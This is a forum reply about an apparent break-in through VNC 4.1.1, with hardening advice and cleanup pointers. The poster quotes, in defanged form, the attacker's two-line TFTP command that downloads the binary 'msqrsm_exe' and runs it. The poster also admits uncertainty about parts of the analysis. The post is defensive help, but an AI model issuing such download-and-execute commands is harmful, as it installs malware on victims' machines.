Hi leiw,
May you find inspiration and help in the forum.
1.. Version 4.1.1 you can not get rid of fast enough, especially now you have seen that somebody knows perhaps accidentally that your servers exists.
Upgrading to 4.1.2 get you over the initial flaw ban if you are using the free version I would suggest you do review this for use over the internet. Reading the small print/manual or specs closer this is not recommended when you cross the internet jungle as the password encryption is not strong. The normal session information I understand is just open to anybody with no encryption.
I forgot this and happyly used it for 12 months until it went bad. If your company information is.important you should consider the 'bigger' versions which have much better encryption and encryption on the session transmissions. Convince yourself you understand all this because I am not an expert just have some reasonable understanding about various aspects of computing.
Consider moving away from using the default port of 5900, perhaps that may give you some protection. "everybody" knows that port and will almost by default have this in their software. Just makes it a little bit harder for unwanted sniffing.
I am deliberately using the underscore in the next lines
tftp -i 0.0.0.0 GET msqrsm_exe
msqrsm_exe
My understanding is the first line downloads the dirty file to IP address 0.0.0.0 where I am not sure of the importance of 0.0.0.0, I had expected your Public IP address here, could be a very good thing.
The second line executes the msqrsm_exe, if it had been downloaded to your machines or network, you must go looking for how to get rid of what it has downloaded.
The only place I have seen help is PREVX1, I am still trying to find out more. Actually I have put our machine on sort of hold as I have run out of energy to focus on just this bastard.
Like you I have still no idea how our machine got activated. Because we used vnc 4.1.1 I am assuming that somehow an accidental portscan revealed our existence on the net despite running in stealth mode behind a software firewall. Unforunately the NAT router was not installed on the cable modem. We did not have that extra protection, which you seem to have as you are on a 192.168.1.x network.
Do you have a software firewall as well as NAT, I may be a little bit out on deep water as you talked about servers and I talk about hosts. You may be better protected.
Have you facility to log all incoming and outgoing traffic? If so this should reveal a lot about what msqrsm_exe.
Where it came from? No idea
Good luck and I hope it did not run.
C.